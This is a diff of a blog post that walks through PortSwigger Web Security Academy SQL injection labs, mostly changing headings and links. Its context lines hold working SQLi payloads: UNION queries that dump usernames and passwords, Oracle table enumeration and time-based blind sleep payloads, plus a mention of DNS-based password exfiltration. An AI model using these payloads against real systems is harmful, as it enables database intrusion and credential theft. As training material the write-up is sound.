--- a/_posts/2023-11-18-wa-sqli.md
+++ b/_posts/2023-11-18-wa-sqli.md
@@ -214,12 +214,12 @@ Example Payload: (password exfiltrated as a subdomain name)
 
 This will result in a DNS lookup like the following, allowing you to view the captured password: `S3cure.cwcsg...burp...net`
 
-> Out-of-band ([OAST](https://portswigger.net/burp/application-security-testing/oast)) techniques are an extremely powerful way to detect and exploit blind SQL injection, due to the high likelihood of success and the ability to directly exfiltrate data within the out-of-band channel. For this reason, `OAST techniques are often preferable` even in situations where other techniques for blind exploitation do work.
+> Out-of-band ([OAST](https://portswigger.net/burp/application-security-testing/oast)) techniques are an extremely powerful way to detect and exploit blind SQL injection, due to the high likelihood of success and the ability to directly exfiltrate data within the out-of-band channel. For this reason, `OAST techniques are often preferable` even in situations where other techniques for blind exploitation do work. - (https://portswigger.net)
 {: .prompt-info}
 
 ## SQLi Labs
 
-> The following information can only help if you are working on the labs. The following can be used as a reference. That being said, solving the blind SQLi labs without the pro version can feel unproductive. I made python scripts that uses socket programming to automate information retrieveal. Try to make your own scripts by understanding the concepts. Socket programming can be a great tool for anyone targeting offensive security roles (Although, I used requests module in the scripts). You can learn more from my Network security series.
+> The following information can only help as a reference while you are working on the labs. I made scripts to automate information retrieveal proces for the blind SQLi labs. Try to make your own scripts by understanding the concepts. Socket programming can be a great tool for anyone targeting offensive security roles (Although, I used requests module for the scripts). You can learn more about socket programming from my [Network security series](/posts/network-security-intro)
 {:.prompt-tip}
 [SQLi scripts](https://github.com/snabith/burpsuite-prep/tree/main/SQLi)
 
@@ -232,8 +232,7 @@ Burp suite: `Ctr+u` for URL encoding. `Ctr+space` to forward a request in the re
 Note: All labs till blind SQL injection follow one set of steps (with a slight variation based on the database type)
 Those steps:
 
-### Lab3
-[Lab: SQL injection attack, querying the database type and version on Oracle | Web Security Academy (portswigger.net)](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle)
+### Lab3 [querying the database type and version on Oracle](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-oracle)
 
 ```
 https://0adc00b303ba9cca804f087000f2009b.web-security-academy.net/filter?category=Pets
@@ -252,15 +251,13 @@ Also, remove the category =pets.
 
 `' union select banner,NULL from v$version--` # similarly version from v$instance--
 
-### Lab4
-[Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft | Web Security Academy (portswigger.net)](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft)
+### Lab4 [querying the database type and version on MySQL and Microsoft](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-querying-database-version-mysql-microsoft)
 ```
 # same thing microsoft and mysql
 ' union select @@version,null--%20 # for space
 ```
 
-### Lab5
-[Lab: SQL injection attack, listing the database contents on non-Oracle databases | Web Security Academy (portswigger.net)](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle)
+### Lab5 [listing the database contents on non-Oracle databases](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-non-oracle)
 
 > Remember, You must figure out the database version and type so that you can use the following payloads. Learn more from the cheat sheet. [SQL injection cheat sheet | Web Security Academy (portswigger.net)](https://portswigger.net/web-security/sql-injection/cheat-sheet)
 {: .prompt-info }
@@ -271,9 +268,9 @@ Also, remove the category =pets.
 ' union SELECT username_trpnyf,password_yzdqam FROM users_ckixjs--
 t7wdl4gsgmu91w1h27y1
 ```
-### Lab6
+### Lab6 [listing the database contents on Oracle](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle)
 Same thing on Oracle
-[Lab: SQL injection attack, listing the database contents on Oracle | Web Security Academy (portswigger.net)](https://portswigger.net/web-security/sql-injection/examining-the-database/lab-listing-database-contents-oracle)
+
 ```
 ' union SELECT table_name,NULL FROM all_tables--
 ' union SELECT column_name,NULL FROM all_tab_columns WHERE table_name = 'USERS_YTEFVA'--
@@ -282,7 +279,6 @@ Same thing on Oracle
 ```
 
 Using select ? instead of select *
-
 
 ### Lab7
 - `' union select NULL,'hwPw0Q',NULL --%20` 
@@ -342,6 +338,9 @@ GET /filter?category='+union+select+null,username+||+'%3a'+||+password+from+user
 ```
 
 ## Lab 11+ Blind SQLi:
+
+[SQLi scripts](https://github.com/snabith/burpsuite-prep/tree/main/SQLi)
+
 ### Lab 11 and 12: Conditional responses
 ```http
 GET / HTTP/2
@@ -419,6 +418,7 @@ a.k.a: ; select case when 1=1 then...
 ```
 
 lab 15: Info retrieval
+
 ```sql
 select if(1=1,sleep(10),'a')
 	'%3bselect+if(1%3d1,sleep(10),'a')%3b'
